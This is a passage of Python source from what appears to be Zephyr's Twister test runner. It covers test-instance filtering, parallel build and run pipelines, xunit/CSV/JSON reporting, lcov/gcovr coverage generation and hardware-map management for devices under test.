tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
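    # Build the (testcase x platform) instance list and record, per instance, the
    # first reason it would be discarded. Instances that survive every check below
    # are added to self.instances; the discard map is stored on self.discards and
    # also returned for reporting.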
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
if tc.build_on_all and not platform_filter:
platform_scope = self.platforms
elif tc.integration_platforms and self.integration:
platform_scope = list(filter(lambda item: item.name in tc.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and tc.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if tc.platform_allow and not platform_filter and not integration:
a = set(platform_scope)
b = set(filter(lambda item: item.name in tc.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in tc.platform_allow, \
self.platforms))
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if tc.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testcase.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
# run only quarantined test to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all and not integration:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in tc.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
                for instance in list(filter(lambda inst: inst.platform.simulation == 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
            # If integration mode is on, all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testcase.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
instance.fill_results_by_status()
self.instances[instance.name] = instance
# Such configuration has to be removed from discards to make sure it won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "skipped"
instance.fill_results_by_status()
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
        # Remove from discards configurations that must not be discarded (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False):
for instance in self.instances.values():
if build_only:
instance.run = False
if instance.status not in ['passed', 'skipped', 'error']:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
# If the instance got 'error' status before, proceed to the report stage
if instance.status == "error":
pipeline.put({"op": "report", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors
)
pb.process(pipeline, done_queue, task, lock, results)
return True
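    # Top-level execution: seed the queue, start self.jobs worker processes running
    # pipeline_mgr(), wait for them to finish and then optionally compute RAM/ROM
    # footprint metrics from the built ELF files.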
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
# FIXME: This needs to move out.
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(self.calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
return results
def discard_report(self, filename):
try:
if not self.discards:
raise TwisterRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
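    # Write a JUnit-style XML report. With full_report=True every individual test
    # case gets its own <testcase> element; otherwise one element per configuration.
    # When append=True existing per-platform <testsuite> elements are updated in
    # place so that re-runs only replace the cases that were actually re-executed.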
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA"):
total = 0
fails = passes = errors = skips = 0
if platform:
selected = [platform]
logger.info(f"Writing target report for {platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
if instance.status:
logger.error(f"{instance.name}: Unknown status {instance.status}")
else:
logger.error(f"{instance.name}: No status")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
                    eleTSProperties = ET.SubElement(eleTestsuite, 'properties')
                    # Multiple 'property' elements can be added to 'properties',
                    # differing by name and value
                    ET.SubElement(eleTSProperties, 'property', name="version", value=version)
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
                eleTSProperties = ET.SubElement(eleTestsuite, 'properties')
                # Multiple 'property' elements can be added to 'properties',
                # differing by name and value
                ET.SubElement(eleTSProperties, 'property', name="version", value=version)
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
                        # remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message=instance.reason)
log_root = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(log_root, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
                    # remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"][@name="{instance.testcase.name}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout", "flash_error"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
log_root = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(log_root, "build.log")
hl = os.path.join(log_root, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
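    # Write a JSON report with one entry per (testcase, platform) pair, including
    # status, failure reason, execution time, footprint data and, for failures, the
    # relevant log output.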
def json_report(self, filename, append=False, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
selected = self.selected_platforms
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
json_data = {}
if os.path.exists(filename) and append:
with open(filename, 'r') as json_file:
json_data = json.load(json_file)
suites = json_data.get("testsuites", [])
if suites:
suite = suites[0]
testcases = suite.get("testcases", [])
else:
suite = {}
testcases = []
for p in selected:
inst = self.get_platform_instances(p)
for _, instance in inst.items():
testcase = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
                ram_size = instance.metrics.get("ram_size", 0)
                rom_size = instance.metrics.get("rom_size", 0)
for k in instance.results.keys():
testcases = list(filter(lambda d: not (d.get('testcase') == k and d.get('platform') == p), testcases ))
testcase = {"testcase": k,
"arch": instance.platform.arch,
"platform": p,
}
if ram_size:
testcase["ram_size"] = ram_size
if rom_size:
testcase["rom_size"] = rom_size
if instance.results[k] in ["PASS"] or instance.status == 'passed':
testcase["status"] = "passed"
if instance.handler:
testcase["execution_time"] = handler_time
elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout", "flash_error"]:
testcase["status"] = "failed"
testcase["reason"] = instance.reason
testcase["execution_time"] = handler_time
if os.path.exists(handler_log):
testcase["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
testcase["device_log"] = self.process_log(device_log)
else:
testcase["build_log"] = self.process_log(build_log)
elif instance.status == 'skipped':
testcase["status"] = "skipped"
testcase["reason"] = instance.reason
testcases.append(testcase)
suites = [ {"testcases": testcases} ]
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
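    # Parse coverage data dumped over the console between the
    # GCOV_COVERAGE_DUMP_START and GCOV_COVERAGE_DUMP_END markers. Judging from the
    # parsing below, each data line is a leading '*', the target .gcda file name, a
    # '<' separator and the hex-encoded payload, e.g. (hypothetical):
    #   *some/build/path/foo.gcda<a1b2c3...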
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
            # If kobject_hash is given for coverage, gcovr fails;
            # hence skip it. This problem only exists in gcovr v4.1.
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
    @staticmethod
    def _interleave_list(prefix, values):
        tuple_list = [(prefix, item) for item in values]
        return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.serial_baud = 115200
if serial_baud:
self.serial_baud = serial_baud
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
new_dut = DUT(platform=platform,
product=product,
runner=runner,
id=id,
serial=serial,
serial_baud=baud,
connected=serial is not None,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
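# For example (hypothetical device, for illustration only):
#   /dev/ttyACM0 -> /dev/serial/by-id/usb-SEGGER_J-Link_000123456789-if00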
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
